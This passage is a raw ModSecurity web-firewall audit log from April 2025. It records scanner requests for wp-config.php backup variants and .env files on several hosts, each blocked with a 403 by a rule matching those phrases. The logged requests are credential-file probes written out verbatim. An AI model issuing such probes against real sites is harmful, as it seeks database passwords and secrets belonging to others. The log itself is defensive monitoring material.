HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --76f14b25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76f14b25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023113170188 837 (- - -) Stopwatch2: 1745023113170188 837; combined=325, p1=290, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76f14b25-Z-- --b69a1671-A-- [19/Apr/2025:07:38:33 +0700] aALwievDiFC_ir7MDwaEiQAAAEQ 103.236.140.4 41318 103.236.140.4 8181 --b69a1671-B-- GET /wp-config.php... HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --b69a1671-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b69a1671-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023113812527 664 (- - -) Stopwatch2: 1745023113812527 664; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b69a1671-Z-- --818a4f66-A-- [19/Apr/2025:07:38:34 +0700] aALwig6cTFSgLAHl7PpbgQAAAAo 103.236.140.4 41324 103.236.140.4 8181 --818a4f66-B-- GET /wp-config.php.old.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.54 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --818a4f66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --818a4f66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023114479477 961 (- - -) Stopwatch2: 1745023114479477 961; combined=409, p1=352, p2=0, p3=0, p4=0, p5=56, sr=128, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --818a4f66-Z-- --91cf5d17-A-- [19/Apr/2025:07:38:35 +0700] aALwi-vDiFC_ir7MDwaEiwAAAFc 103.236.140.4 41326 103.236.140.4 8181 --91cf5d17-B-- GET /wp-config.php.antigo HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --91cf5d17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91cf5d17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023115122738 704 (- - -) Stopwatch2: 1745023115122738 704; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91cf5d17-Z-- --aa31f70b-A-- [19/Apr/2025:07:38:35 +0700] aALwi-vDiFC_ir7MDwaEjQAAAEY 103.236.140.4 41332 103.236.140.4 8181 --aa31f70b-B-- GET /wp-config.php.oldd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --aa31f70b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa31f70b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023115724619 854 (- - -) Stopwatch2: 1745023115724619 854; combined=334, p1=296, p2=0, p3=0, p4=0, p5=37, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa31f70b-Z-- --debd9477-A-- [19/Apr/2025:07:38:43 +0700] aALwk-vDiFC_ir7MDwaElgAAAFM 103.236.140.4 41366 103.236.140.4 8181 --debd9477-B-- GET /wp-config.php.new2021 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --debd9477-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --debd9477-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023123146927 851 (- - -) Stopwatch2: 1745023123146927 851; combined=352, p1=315, p2=0, p3=0, p4=0, p5=37, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --debd9477-Z-- --4bce0b1e-A-- [19/Apr/2025:07:38:43 +0700] aALwk-vDiFC_ir7MDwaEmAAAAEQ 103.236.140.4 41372 103.236.140.4 8181 --4bce0b1e-B-- GET /wp-config.php.new2022 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --4bce0b1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bce0b1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023123790238 833 (- - -) Stopwatch2: 1745023123790238 833; combined=325, p1=293, p2=0, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bce0b1e-Z-- --4f9de019-A-- [19/Apr/2025:07:38:44 +0700] aALwlOvDiFC_ir7MDwaEmQAAAFg 103.236.140.4 41374 103.236.140.4 8181 --4f9de019-B-- GET /wp-config.php.new2023 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --4f9de019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f9de019-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023124408152 696 (- - -) Stopwatch2: 1745023124408152 696; combined=288, p1=255, p2=0, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f9de019-Z-- --d429cf27-A-- [19/Apr/2025:07:38:45 +0700] aALwlevDiFC_ir7MDwaEmwAAAEg 103.236.140.4 41380 103.236.140.4 8181 --d429cf27-B-- GET /wp-config.php.new2024 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --d429cf27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d429cf27-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023125009951 893 (- - -) Stopwatch2: 1745023125009951 893; combined=400, p1=363, p2=0, p3=0, p4=0, p5=37, sr=148, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d429cf27-Z-- --788c1a0a-A-- [19/Apr/2025:07:38:45 +0700] aALwlXNa4dA2HllpK_MT3wAAAJg 103.236.140.4 41382 103.236.140.4 8181 --788c1a0a-B-- GET /wp-config.php.new2025 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --788c1a0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --788c1a0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023125604756 13198 (- - -) Stopwatch2: 1745023125604756 13198; combined=25148, p1=237, p2=0, p3=0, p4=0, p5=12470, sr=67, sw=0, l=0, gc=12441 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --788c1a0a-Z-- --d3bd1364-A-- [19/Apr/2025:07:40:30 +0700] aALw_g6cTFSgLAHl7PpbjwAAABI 103.236.140.4 41742 103.236.140.4 8181 --d3bd1364-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.151.123.58 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.151.123.58 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --d3bd1364-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3bd1364-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023230093565 784 (- - -) Stopwatch2: 1745023230093565 784; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3bd1364-Z-- --eeed7077-A-- [19/Apr/2025:07:40:31 +0700] aALw_0ruoUXZj665VUF9EQAAAM8 103.236.140.4 41750 103.236.140.4 8181 --eeed7077-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.151.123.58 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.151.123.58 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --eeed7077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eeed7077-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023231098561 654 (- - -) Stopwatch2: 1745023231098561 654; combined=277, p1=240, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eeed7077-Z-- --2d64e630-A-- [19/Apr/2025:08:20:22 +0700] aAL6VkruoUXZj665VUF_CAAAAMA 103.236.140.4 50942 103.236.140.4 8181 --2d64e630-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 Accept-Charset: utf-8 --2d64e630-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d64e630-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745025622878149 788 (- - -) Stopwatch2: 1745025622878149 788; combined=344, p1=304, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d64e630-Z-- --0c0d6520-A-- [19/Apr/2025:09:22:11 +0700] aAMI00ruoUXZj665VUGB6QAAAM4 103.236.140.4 36808 103.236.140.4 8181 --0c0d6520-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 139.59.245.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.59.245.198 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* --0c0d6520-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c0d6520-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745029331775722 947 (- - -) Stopwatch2: 1745029331775722 947; combined=376, p1=336, p2=0, p3=0, p4=0, p5=40, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c0d6520-Z-- --b9bf0369-A-- [19/Apr/2025:11:06:45 +0700] aAMhVUruoUXZj665VUGI5AAAANc 103.236.140.4 33420 103.236.140.4 8181 --b9bf0369-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.203.68.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.203.68.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b9bf0369-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9bf0369-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745035605686505 709 (- - -) Stopwatch2: 1745035605686505 709; combined=313, p1=275, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9bf0369-Z-- --43191243-A-- [19/Apr/2025:11:17:41 +0700] aAMj5Q6cTFSgLAHl7Ppq5AAAABM 103.236.140.4 35866 103.236.140.4 8181 --43191243-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --43191243-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43191243-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036261593698 672 (- - -) Stopwatch2: 1745036261593698 672; combined=262, p1=227, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43191243-Z-- --cc765e16-A-- [19/Apr/2025:11:17:42 +0700] aAMj5g6cTFSgLAHl7Ppq5gAAABQ 103.236.140.4 35872 103.236.140.4 8181 --cc765e16-B-- GET /.env.local HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --cc765e16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc765e16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036262728504 762 (- - -) Stopwatch2: 1745036262728504 762; combined=301, p1=263, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc765e16-Z-- --8b36c75f-A-- [19/Apr/2025:11:17:44 +0700] aAMj6A6cTFSgLAHl7Ppq6AAAABg 103.236.140.4 35878 103.236.140.4 8181 --8b36c75f-B-- GET /.env.production HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --8b36c75f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b36c75f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036264346831 752 (- - -) Stopwatch2: 1745036264346831 752; combined=358, p1=262, p2=0, p3=0, p4=0, p5=96, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b36c75f-Z-- --492ae06a-A-- [19/Apr/2025:11:17:46 +0700] aAMj6nNa4dA2HllpK_MfwwAAAIM 103.236.140.4 35890 103.236.140.4 8181 --492ae06a-B-- GET /wp-content/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --492ae06a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --492ae06a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036266575751 875 (- - -) Stopwatch2: 1745036266575751 875; combined=369, p1=323, p2=0, p3=0, p4=0, p5=46, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --492ae06a-Z-- --f557056e-A-- [19/Apr/2025:11:17:47 +0700] aAMj63Na4dA2HllpK_MfxAAAAJc 103.236.140.4 35896 103.236.140.4 8181 --f557056e-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --f557056e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f557056e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036267696759 784 (- - -) Stopwatch2: 1745036267696759 784; combined=333, p1=298, 